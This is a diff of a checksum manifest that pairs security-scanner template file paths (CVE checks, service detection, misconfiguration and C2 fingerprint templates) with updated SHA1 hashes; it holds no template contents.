@@ -537,8 +537,8 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2 -helpers/wordpress/plugins/woocommerce-payments.txt:60e6b29cae222d0ccf5641a7ebe9d778961c2629 -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 +helpers/wordpress/plugins/woocommerce-payments.txt:5087f47c1da6ef46c35e08c9ec1a9e2db4fc24a4 +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/woocommerce-services.txt:440a9edb1796d0cd5f2d71aea1a74af81b05abbd helpers/wordpress/plugins/woocommerce.txt:dfaff11acbd25d0758b7c5294b4ff9d37debac19 @@ -2540,6 +2540,7 @@ http/cves/2023/CVE-2023-24657.yaml:7f6b27269830343d72aabbf9cc3b6468b0402832 http/cves/2023/CVE-2023-24733.yaml:2b371df5ef8cff42ce8aecc6ef5670299835f5a5 http/cves/2023/CVE-2023-24735.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826 http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1 +http/cves/2023/CVE-2023-2479.yaml:ea2e5aa5a99963579d74b5a1b0521c6450e7ec48 http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99 http/cves/2023/CVE-2023-25346.yaml:24944581a291d6d9ab20cb2c6f4efe877149ae44 
@@ -2656,6 +2657,7 @@ http/cves/2023/CVE-2023-42442.yaml:c6e765cc76d6e24c920ac246e83837e68011c2fd http/cves/2023/CVE-2023-4568.yaml:a40438e923a862215d522cfad6534b0fb3374249 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071 http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042 +http/cves/2023/CVE-2023-5074.yaml:439a4e67d8763ee84d57902b062f1fc464e11453 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 @@ -4505,6 +4507,7 @@ http/misconfiguration/installer/impresspages-installer.yaml:0d25cc61a9726b3527e2 http/misconfiguration/installer/indegy-sensor-installer.yaml:c4b65b906536d0e71d9128a43b1bbf31c7c6ad55 http/misconfiguration/installer/jira-setup.yaml:98368f306cef91d92ecd53725eca807b2cf1af2a http/misconfiguration/installer/joomla-installer.yaml:9f89a6d16c8fef98b9a4de986d22768b2aa76895 +http/misconfiguration/installer/klr300n-installer.yaml:24c4c70cfdf1cfbde3df5ce9bdad6c9822383e1a http/misconfiguration/installer/limesurvey-installer.yaml:54fa5e339c11fa21e16c99344948bfcd4c854335 http/misconfiguration/installer/lmszai-installer.yaml:bd5e1d6df6913b83a85555d8015ece59b19bf27a http/misconfiguration/installer/lychee-installer.yaml:54b1ca8400339d8ce3442109dea8356a809288a2 
@@ -4522,7 +4525,7 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:d9b8f35bbf4 http/misconfiguration/installer/nginx-auto-installer.yaml:a45c4bc03311eb33170957d65fa62b0a194427d6 http/misconfiguration/installer/nodebb-installer.yaml:7a5df25da7163e43f58532154f602652d0b013cc http/misconfiguration/installer/nopcommerce-installer.yaml:4568895e83d6888dd2e4eefb6df641258b227f79 -http/misconfiguration/installer/ojs-installer.yaml:a8737d5a86376bda445e5fe2c141143a79cf5e29 +http/misconfiguration/installer/ojs-installer.yaml:7317b5f8e060b50bc6d4c41a04f529ac758b12ed http/misconfiguration/installer/openmage-install.yaml:4aa42695d5062c627d4290348a5459f57ecf5a14 http/misconfiguration/installer/openshift-installer-panel.yaml:d8a752d34b8064b82613b1fdd6c70c3dc16bb6ff http/misconfiguration/installer/opensis-installer.yaml:b2b80ff3af51a7ccc9f2f70da8853f4a4ac0b85a @@ -5998,8 +6001,8 @@ http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c +http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a 
@@ -7050,90 +7053,90 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:867377dd72eed091ea11ee05778c06855a5aef2b http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:68c6f8ed4ebd17880e69cb75ff46e4594f9b1274 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:026425b2b85ab06c5db42d543763a9d6cfcc8794 -network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f -network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 -network/cves/2001/CVE-2001-1473.yaml:4145fb7f555bfac7ccca007a9fb5852758e106f2 -network/cves/2011/CVE-2011-2523.yaml:4ccb3e295a9d1767f6cbcb9a002612925bd6a515 -network/cves/2015/CVE-2015-3306.yaml:3c84863be8c2479425260df77377099bb9fd9478 -network/cves/2016/CVE-2016-2004.yaml:06a7c58f1150be1ce743ede2cf57f09379479ae2 -network/cves/2016/CVE-2016-3510.yaml:2850b8cede8767d64635c87818c2dbeaa0c12f12 -network/cves/2017/CVE-2017-3881.yaml:5a1798099302282f684b4e45404fee4eb239b5a8 -network/cves/2017/CVE-2017-5645.yaml:912a3a77c286cf1cfaa14bc57eb0be80419393c0 +network/backdoor/backdoored-zte.yaml:f2404c7da8bc8f4a0f44c9a98c954a0b70b6a6ca +network/backdoor/vsftpd-backdoor.yaml:be584f958ad40909f5fd12048c1c70840e5b55fd +network/cves/2001/CVE-2001-1473.yaml:3533c4dd73e57282133423457b202f16ce6b8dac +network/cves/2011/CVE-2011-2523.yaml:827f6785ecdf7e6e387253450f502995bc2cf5c3 +network/cves/2015/CVE-2015-3306.yaml:55a8f518a54a533a10b30e3bd93ba1039bdb1f0e +network/cves/2016/CVE-2016-2004.yaml:eaeffebb559fa76744fd7fd1b779b5e5521dbeb0 +network/cves/2016/CVE-2016-3510.yaml:ab649b2bd1a9eda70cb43d600b6320c45f01806e +network/cves/2017/CVE-2017-3881.yaml:b97e5e80d981cb76446c857d349e7d3fb63bd9a9 +network/cves/2017/CVE-2017-5645.yaml:385b1455ebbddb6136054cd2886c87f50818135d network/cves/2018/CVE-2018-2628.yaml:f823ce8c5d0f0f9947a5131c6fe61f0edd98ad0d -network/cves/2018/CVE-2018-2893.yaml:0747425f4e3eb128e08736b1aaca8872266c580d 
-network/cves/2020/CVE-2020-11981.yaml:6797dad5754668382eb920b2ac5c294da9398fa2 -network/cves/2020/CVE-2020-1938.yaml:87d1735c3efbd037c2c0669e4d6ef6d195858d12 -network/cves/2020/CVE-2020-7247.yaml:fc45c678e38dc35825a377e30e8ef66b9360c660 -network/cves/2021/CVE-2021-44521.yaml:40361b30bb6231972a24076b80cdb0ed85b05279 -network/cves/2022/CVE-2022-0543.yaml:a27a67b45dfceaef860fd6c59bd22394145882cb -network/cves/2022/CVE-2022-24706.yaml:4a036736022e99e18a148bd86a3894d95b151084 +network/cves/2018/CVE-2018-2893.yaml:99800642b6815c2ddd46dbdac4c51206b467271e +network/cves/2020/CVE-2020-11981.yaml:d73e69b51496835f55e58fabb67992aa6635203c +network/cves/2020/CVE-2020-1938.yaml:887bd58e985526a366f67962db239a627e9e5181 +network/cves/2020/CVE-2020-7247.yaml:9ed3065e9ee6c3f121fe08a6117d586ff352eb8c +network/cves/2021/CVE-2021-44521.yaml:2cc6438637f42c0e34ecc68f2459b050ededd971 +network/cves/2022/CVE-2022-0543.yaml:c9f0f01774372aae54622c97b9a68ce5997cc3b2 +network/cves/2022/CVE-2022-24706.yaml:3fcf75994b8852f37271048b9af452f602c79a95 network/cves/2022/CVE-2022-31793.yaml:ac870c80a1d17e215fc1357d257cdd07f2aca8da -network/cves/2023/CVE-2023-33246.yaml:cd9f687e6cb2d556fcf07482f242a3703180d023 -network/default-login/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 -network/default-login/ftp-weak-credentials.yaml:d4749ba120717dc1f34f263bc2d9413c2f9662d0 -network/default-login/ldap-anonymous-login.yaml:48fa5969a454ef01ca1cc73deb5423f764de8790 -network/detection/activemq-openwire-transport-detect.yaml:5341048ef6135611d6586414227704e61bf710eb -network/detection/apache-activemq-detect.yaml:96a3df34ded2f9707a536d0fc05eb0d7414749d2 -network/detection/axigen-mail-server-detect.yaml:f1316025d891e64008612574e3fd895bb7aca99f -network/detection/cisco-finger-detect.yaml:b276bbcf3d47e682f18155685150f07cedf698e5 -network/detection/clamav-detect.yaml:f856880b2fbc4d968e3bb45782c200277487e441 -network/detection/cql-native-transport.yaml:3d6e54aa9773e16aa2e9c75f61462bf1d45a8205 
-network/detection/detect-addpac-voip-gateway.yaml:25eca59ccaf9984df28dd1c01dd4d58c67c23dfd -network/detection/detect-jabber-xmpp.yaml:8aa9448785a0dc82118ffc8b9af51e928cd60c60 -network/detection/dotnet-remoting-service-detect.yaml:fb9338dba6ec3d7e5cb5a97f220d451c33594c9c -network/detection/dropbear-cbc-ciphers.yaml:c9e37bbd3d8025d202c9871620fcf07ec5f3f389 -network/detection/esmtp-detect.yaml:a40b86cde437aad247271dbffb12fd488e3b097a -network/detection/expn-mail-detect.yaml:ea9b02907ca016b2f52e153cbdaab31777064c78 -network/detection/finger-detect.yaml:b633bc4e54f3cf5421cf90d17d607d502db8a6e5 -network/detection/gnu-inetutils-ftpd-detect.yaml:13032bebe217b19d1069ebb90b8855ad019fda28 -network/detection/gopher-detect.yaml:63356156c5578e594b630bc0e7b341ca2e12a30c -network/detection/ibm-d2b-database-server.yaml:7532b5b14424f0bfdeeac34f2883d1e958da3b3c -network/detection/imap-detect.yaml:792e8e90cc05dd94184c7e2e584f55a2e9d0d253 -network/detection/iplanet-imap-detect.yaml:797804466967f502f94cb46f786ea756640df995 +network/cves/2023/CVE-2023-33246.yaml:31795e9d41202a88961af586a1d947fa60d90246 +network/default-login/ftp-anonymous-login.yaml:20a6c899ab3d67d5e178c0d167d8fce637945c1a +network/default-login/ftp-weak-credentials.yaml:40ce5a09aff1c80a461d2acebb8cb3816bda9779 +network/default-login/ldap-anonymous-login.yaml:5ceeb7c64897a0469e3b9e5a2ec925567c0a8925 +network/detection/activemq-openwire-transport-detect.yaml:a2a7d1d1be98ebc53229cce7b9a75e0aefc516b2 +network/detection/apache-activemq-detect.yaml:15b56708cf6d6f8dca783cb40b6d3f9b1ffb765d +network/detection/axigen-mail-server-detect.yaml:658eaaf7b6ae1a881862207802800b3052d0324d +network/detection/cisco-finger-detect.yaml:b242374a1df790541b766f4f0e36666a2a7549c5 +network/detection/clamav-detect.yaml:8616e250aa69c74ff903919b6cff28a77c4ae075 +network/detection/cql-native-transport.yaml:ccd025169c99c719b79d13cf8b72a58559321a07 +network/detection/detect-addpac-voip-gateway.yaml:86931a2b160f7ffb63386c2add91b28f91648595 
+network/detection/detect-jabber-xmpp.yaml:94388107835fcf3923fb0151ff02b4b9a35d829c +network/detection/dotnet-remoting-service-detect.yaml:ecae3ec87ce7d816448d05a5b611fcc4ce248407 +network/detection/dropbear-cbc-ciphers.yaml:896bdca3f90b65c9c6013438d67eb8c95389f6d8 +network/detection/esmtp-detect.yaml:470b3c4eecbc6946f1af9755fb0e934d91e2ab86 +network/detection/expn-mail-detect.yaml:e10d98af34370bdc982563d1878f8f558e197ecf +network/detection/finger-detect.yaml:eab8109135becb245495b39e84f6123721586bfd +network/detection/gnu-inetutils-ftpd-detect.yaml:c2e348774b35f11a845bcb7c2a726df335749b80 +network/detection/gopher-detect.yaml:3901b4cf94fbb3661b0aeb904a38f3f6b8194c80 +network/detection/ibm-d2b-database-server.yaml:9c219e670702e3369473a0c68fafbc8d75a87ab0 +network/detection/imap-detect.yaml:711c3da60996bbd7175b494caabb90523febbca4 +network/detection/iplanet-imap-detect.yaml:6252d0cd1de590c9de0ee8ac5bf9968d45b1234e network/detection/java-rmi-detect.yaml:d724183dc184431e03ed5c8274421665c7bda989 -network/detection/microsoft-ftp-service.yaml:92b1c3349e9f029e476f9d13798797fc45906ee4 -network/detection/mikrotik-ftp-server-detect.yaml:c43d32e0437d4e6b1188ad7fdce3ab17d4329938 -network/detection/mikrotik-routeros-api.yaml:cabbd4773b4fe9287d47cc42ea78d30c9562f1e3 -network/detection/mongodb-detect.yaml:2c765e6540b259f964bb53cb01ff81a64c80a78b -network/detection/msmq-detect.yaml:5d977a358a7a5bbc1837ce60bdc31af7df92d59b -network/detection/mysql-detect.yaml:4c716a0a7a60b45626cd756a2c949ca9e31439cb -network/detection/openssh-detect.yaml:84efaa8f67216536f0e879a983157f364c0c27de -network/detection/pgsql-detect.yaml:2d8931b96bf60405c27040a2b26fb8402ab524f9 -network/detection/pop3-detect.yaml:63f7b18a6aa15bf1ebb13c26a094c48b3607a203 -network/detection/proftpd-server-detect.yaml:0364267073c68f8c76a58c785b7295b7101aa87c -network/detection/rabbitmq-detect.yaml:4ea11fe71f516437ee18948bef434aafc57eca62 -network/detection/rdp-detect.yaml:eed3037c8e3caf6e57e40d767f2456e423e91384 
-network/detection/redis-detect.yaml:55fb1ac0ec017cc8870f1ca389ba3e9284c414ce -network/detection/riak-detect.yaml:73cddd9093f8e8526acc0d9b9b5457306749ec34 -network/detection/rpcbind-portmapper-detect.yaml:64093f99eb18abeb9a85721e6a44b3a4d26d57e3 -network/detection/rsyncd-service-detect.yaml:5c3f80f8c0e34c9273c639b5083f044f1e16a5ea -network/detection/rtsp-detect.yaml:6ab1273e3c9a6bc2b7655ba3cc88ece640e5cd5c -network/detection/samba-detect.yaml:f9f2fdf3001bac13094a48958b3a32489d46564b -network/detection/sap-router.yaml:4d28d97202f3fdfa85d69a06b008d13ebd1e697c -network/detection/smb-detect.yaml:5e42e55f8f85322f4db93767ab90a895db57f76c -network/detection/smtp-detect.yaml:c059ef31c5bb6b3ecbff0fbe5e8283344b29ac27 -network/detection/sshd-dropbear-detect.yaml:7c972bdaa3dfbcd1173e3374998ff874f13d2da7 -network/detection/starttls-mail-detect.yaml:66fc7ae7adabd5060d46c12e42a1cab23d1ea933 -network/detection/teamspeak3-detect.yaml:cad767eb30c1407e7d8978102f7294b48f004378 -network/detection/telnet-detect.yaml:42d2d700d5d2505efe90dad20055132528312f13 -network/detection/totemomail-smtp-detect.yaml:59d077ac0097a20fd58a5cf017d54fd7481f278c -network/detection/vmware-authentication-daemon-detect.yaml:81fe7f8be7c047f43a06b421b8d6ef1b97e25e50 -network/detection/vnc-service-detect.yaml:75bdf9c29f7666004c92b3f7183dec085e8126df +network/detection/microsoft-ftp-service.yaml:e50fb87b704d9e1afca92335bff43102192c4ea4 +network/detection/mikrotik-ftp-server-detect.yaml:a044ce5ddf8d1511272d3be61e2a6ac1fae65dd9 +network/detection/mikrotik-routeros-api.yaml:39f157753ce8be7239d12494e5f7b458f79cf347 +network/detection/mongodb-detect.yaml:f2d353e05a121675c34ad57d7b75888342b2fa24 +network/detection/msmq-detect.yaml:4c3895d1a669b762a75ad31aac269090c48a55bf +network/detection/mysql-detect.yaml:e1bc919065aa2b6272dae784d33d77e0733757c8 +network/detection/openssh-detect.yaml:e4e89cbf2e5603105b2c106259ee6ed3ea5e907e +network/detection/pgsql-detect.yaml:b71235f0e0a89752d8a6529cfb2f6df7ac4dcec7 
+network/detection/pop3-detect.yaml:4dfb3a5e10ac41f9d08912ce25e5895512f348a2 +network/detection/proftpd-server-detect.yaml:f8e31581df48389c3cdadcd7a1ed6d35adbe2099 +network/detection/rabbitmq-detect.yaml:69219a94f9425ecf96ee9e9678711cfcbd87b797 +network/detection/rdp-detect.yaml:86666e40065620d31395570f8d80e6adbe4dde3e +network/detection/redis-detect.yaml:7ef522d24e9e0914ff5367bc5fa42d1b46323fa4 +network/detection/riak-detect.yaml:547e4a1204dc2fde23d40e1bc162ab2a161bebc0 +network/detection/rpcbind-portmapper-detect.yaml:e81701b944f44e94cbe6f82e2c3ba4f71c3cb28c +network/detection/rsyncd-service-detect.yaml:007ce06c7619746977e4d4aacdb505397ff54376 +network/detection/rtsp-detect.yaml:41b325b0bedc536f795d5b108eab0809b5fb7645 +network/detection/samba-detect.yaml:1d01568e7fc2462ce96c515723afe281f5894171 +network/detection/sap-router.yaml:4f748f58cf50d3a389217e892eb7d8c9eed4c064 +network/detection/smb-detect.yaml:b0c061673b26b5a60fa6f2e0eb20de37c08ba66b +network/detection/smtp-detect.yaml:4cb698e3aef0566a80be0f15ad73d05d98dcc2f5 +network/detection/sshd-dropbear-detect.yaml:dc663f0b684b4c5a0443171ac324a65e88a91353 +network/detection/starttls-mail-detect.yaml:76b6099c08373bc8c49dc0bf4a67ee8598c7811b +network/detection/teamspeak3-detect.yaml:db3d1ee5ab40f3d460f4463329ab757152df6aa1 +network/detection/telnet-detect.yaml:8fbcde5667ca617d7e35844cc4573fc806470eb6 +network/detection/totemomail-smtp-detect.yaml:67399b872a46c4042a6d7cc2242fbda598fe80e1 +network/detection/vmware-authentication-daemon-detect.yaml:c3200055ad0072a42b7c7e67374d348f236b2ded +network/detection/vnc-service-detect.yaml:fe0054cc1b77b69404d2f446676403f252b82b98 network/detection/weblogic-iiop-detect.yaml:94b8c1aaec6ffabca45c86cfb25b3a609e30bdfe network/detection/weblogic-t3-detect.yaml:ce204c445556d0e1e07af1f6aaa65ee9c817d252 -network/detection/xlight-ftp-service-detect.yaml:709c4f6625b56fb99b25ba9992167c48b44a107d -network/enumeration/beanstalk-service.yaml:ff6de1500ec329dac7a3d24d8e92f9fe8518f1de 
-network/enumeration/kafka-topics-list.yaml:c169fb5b159e4ea9c9a86122afd1b0f0c4fa4943 -network/enumeration/mongodb-info-enum.yaml:137dd278383c71d517fc341a852fb786ace9daad -network/enumeration/niagara-fox-info-enum.yaml:4d28582676b275af6cadc3bc63ad5ba278bcf856 -network/enumeration/psql-user-enum.yaml:0a2f5b0095347687d51554f03cd5141463855dd0 -network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42 -network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43 -network/exposures/cisco-smi-exposure.yaml:22368c9dd2c17aa863f31268713da67650c498b1 -network/exposures/exposed-adb.yaml:51e6daeb3e5bed63b7d45f37e037e67e971adf16 -network/exposures/exposed-dockerd.yaml:0fbaae44d57f346911a4ebca079bcf165b8a4c85 -network/exposures/exposed-redis.yaml:e9480d8e9207c6e5933482cfcff732a8abb8b3a0 -network/exposures/exposed-zookeeper.yaml:44b26aa0b0b3bc628ff494ed455edd6043732d2a +network/detection/xlight-ftp-service-detect.yaml:df09822d9cc6fa1b1e4f7f99bbacfc9c24160159 +network/enumeration/beanstalk-service.yaml:6b761f32a18de725b06376576ad12d85a4ebf832 +network/enumeration/kafka-topics-list.yaml:c90f512f4ec006edc4c6986c0728015fa8525358 +network/enumeration/mongodb-info-enum.yaml:b77a072348b1dacf4f8d530063fd1e5f47cfea3a +network/enumeration/niagara-fox-info-enum.yaml:cd3fc20375db89c116c2c5dcb82e970c0ab3a73e +network/enumeration/psql-user-enum.yaml:c4c232dd301986d3c29e04e06748f57438fb1e0e +network/enumeration/smtp/smtp-user-enum.yaml:1d4749091fccd1b9fa25ee8b09f34c3b51592152 +network/enumeration/smtp-commands-enum.yaml:e28d80b6ecb2e283d43f58f74e3d1ba6c63455fb +network/exposures/cisco-smi-exposure.yaml:c760fcd32e21fc17283ed9a02c09a571a3680f29 +network/exposures/exposed-adb.yaml:52627ae57853ac9a610d3e789905bd2c557d9de4 +network/exposures/exposed-dockerd.yaml:a690f5be8036ac62769b004e1354f6638fcaa87b +network/exposures/exposed-redis.yaml:3887effd170b1f500a92bd2725b325d4d6b3ce05 
+network/exposures/exposed-zookeeper.yaml:1b4fc1c2c6a2131c33a293a4655c4e0d3f4fe6b0 network/jarm/c2/cobalt-strike-c2-jarm.yaml:7bf85725d77f35262ff24b7678adc4461404b92e network/jarm/c2/covenant-c2-jarm.yaml:71fe7c9b7f6f7fbef263204bf701a6a5a513eb1f network/jarm/c2/deimos-c2-jarm.yaml:bcbf9501f84caefd8c9385a3575a3fb6c2fd4ce2 
@@ -7150,22 +7153,22 @@ network/jarm/c2/posh-c2-jarm.yaml:06aa7bbb8f3cd637fde301b7eac9c83b68467f0c network/jarm/c2/shad0w-c2-jarm.yaml:21d654db72d9fbefa32a7ec40d4a77616aa4a43a network/jarm/c2/silenttrinity-c2-jarm.yaml:fdec712cc69eed900b0d7ba42187a0ea0e7bb95b network/jarm/c2/sliver-c2-jarm.yaml:dd41a2f23026cb1ce6fab8fb12f3e4a82a2accc3 -network/misconfig/apache-dubbo-unauth.yaml:09668afcc0c2b0182f0bf739cb077295a979c353 -network/misconfig/apache-rocketmq-broker-unauth.yaml:d9cfd62b876feabd3952ddc4eaa6c996eb4876bc -network/misconfig/clamav-unauth.yaml:559dfa23076118f5ce1d84ffd9a76efb5d1d4422 -network/misconfig/clickhouse-unauth.yaml:c47517fbfc5f4a0425f884c42ef218e776b92cbc -network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 -network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 -network/misconfig/ganglia-xml-grid-monitor.yaml:62649538ea72479f23f8f454790b21388b8f56b6 -network/misconfig/memcached-stats.yaml:1d54fbf17762442553b9c16d16bf2776a42aa2b9 -network/misconfig/mongodb-unauth.yaml:2fd6f2959bb97ab660377dcfad6e9db4559b605e -network/misconfig/mysql-native-password.yaml:ef8676ebf814fe1084e81eeaf9bf70b999ff8b45 -network/misconfig/printers-info-leak.yaml:cb6c13a840a2765acf43726c754aa243b0101199 -network/misconfig/sap-router-info-leak.yaml:008df0e634639e012bd67b242172b20d93b92630 -network/misconfig/tidb-native-password.yaml:ee468366b1737d416807ecb51feae7b35ed27a4f -network/misconfig/tidb-unauth.yaml:98ce03032751882e00f5ea0880511d5aa356de74 -network/misconfig/unauth-psql.yaml:c54c9c89d460a71bc82267bd5737dbde45e53122 -network/vulnerabilities/clockwatch-enterprise-rce.yaml:fcfd279274514fa3474ff1b2d83f98c5463ff8c2 +network/misconfig/apache-dubbo-unauth.yaml:9fc2673de80d24caa065664242dfbd2eb1392eb4 +network/misconfig/apache-rocketmq-broker-unauth.yaml:aec4738a8ac3af859878ab933b173856d6c2be54 +network/misconfig/clamav-unauth.yaml:20adfce3848329dbb83e8f18a1e17ad8767f8ab8 
+network/misconfig/clickhouse-unauth.yaml:4d0e9f50cdf7d2241db5ee84b8ccb207a46230c8 +network/misconfig/dropbear-weakalgo.yaml:27cdaa70b7fe79843b983b161e1fad88288a373b +network/misconfig/dropbear-weakmac.yaml:760914a845a37654688bae793af4a4201c389482 +network/misconfig/ganglia-xml-grid-monitor.yaml:fc9b7c0872ffc3a33b0f680e53c0e1f74fb15544 +network/misconfig/memcached-stats.yaml:29b5e7465487bcd2328367ddc9c57ae4b30abafc +network/misconfig/mongodb-unauth.yaml:1f53455484d54404a99989dd24d6c625018db29d +network/misconfig/mysql-native-password.yaml:dc73cd03694628961e4c23e897004316f93d0437 +network/misconfig/printers-info-leak.yaml:e2db9eb3ecff671c0c3f68f0d150e4970895c0ed +network/misconfig/sap-router-info-leak.yaml:ad7ae897ff318aa35b5191b6950022c9b17013ee +network/misconfig/tidb-native-password.yaml:5a201045c715852806eb2f11c2d7320f428fd104 +network/misconfig/tidb-unauth.yaml:a2ae3b64fb37d676ab8343b68c77f98c0855997b +network/misconfig/unauth-psql.yaml:eed9adc5419a909329f6f49eca32a1a1455963ee +network/vulnerabilities/clockwatch-enterprise-rce.yaml:eb8bd907db57a3f2c47999d0bc026d17550f4e0c ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55 ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a ssl/c2/cobalt-strike-c2.yaml:fa3905fc13397006d2bdba8729cf4879f3ecf541 @@ -7192,7 +7195,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:c231fe51c6ebce79078483d2407f8f3ba3cefd42 +templates-checksum.txt:3fa9d3f4155f376df13f89495d8c7b190ad97a68 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f